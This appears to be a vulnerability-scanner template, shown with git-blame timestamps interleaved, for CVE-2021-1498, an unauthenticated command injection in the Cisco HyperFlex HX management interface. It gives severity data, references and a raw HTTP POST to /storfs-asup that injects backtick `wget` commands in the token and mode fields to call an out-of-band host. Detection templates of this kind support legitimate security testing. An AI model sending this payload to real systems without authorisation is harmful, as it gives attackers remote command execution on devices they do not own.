2021-09-29 17:05:43 +00:00
id : CVE-2021-1498
info :
2022-04-29 19:58:07 +00:00
name : Cisco HyperFlex HX Data Platform - Remote Command Execution
2021-09-29 17:05:43 +00:00
author : gy741
severity : critical
2022-04-29 19:58:07 +00:00
description : Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
2021-09-29 17:05:43 +00:00
reference :
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1498
- https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
- https://twitter.com/Unit42_Intel/status/1402655493735206915
- https://twitter.com/ptswarm/status/1390300625129201664
- https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-29 17:05:43 +00:00
cve-id : CVE-2021-1498
cwe-id : CWE-78
2023-07-15 16:29:17 +00:00
epss-score : 0.97531
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99984
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cisco
product : hyperflex_hx_data_platform
tags : kev,packetstorm,cve,cve2021,cisco,rce,oast,mirai
2021-09-29 17:05:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-29 17:05:43 +00:00
- raw :
- |
POST /storfs-asup HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/x-www-form-urlencoded
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200